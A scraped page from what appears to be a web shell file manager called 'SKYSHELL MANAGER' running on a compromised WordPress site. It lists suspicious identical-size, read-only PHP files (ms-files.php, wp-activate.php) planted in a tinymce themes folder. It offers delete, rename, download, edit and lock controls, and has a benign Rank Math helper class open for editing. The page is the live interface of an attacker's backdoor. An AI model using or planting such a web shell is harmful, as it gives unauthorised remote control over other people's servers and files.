📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: class-editor.php
<?php /** * The Editor helpers. * * @since 1.0.9 * @package RankMath * @subpackage RankMath\Helpers * @author Rank Math <support@rankmath.com> */ namespace RankMath\Helpers; use RankMath\Helper; defined( 'ABSPATH' ) || exit; /** * Editor class. */ class Editor { /** * Can add editor. * * @return bool */ public static function can_add_editor() { return Helper::has_cap( 'onpage_general' ) || Helper::has_cap( 'onpage_advanced' ) || Helper::has_cap( 'onpage_snippet' ) || Helper::has_cap( 'onpage_social' ); } /** * Add option to Lock Modified date in the editor. * * @return bool */ public static function can_add_lock_modified_date() { return apply_filters( 'rank_math/lock_modified_date', true ); } }
Save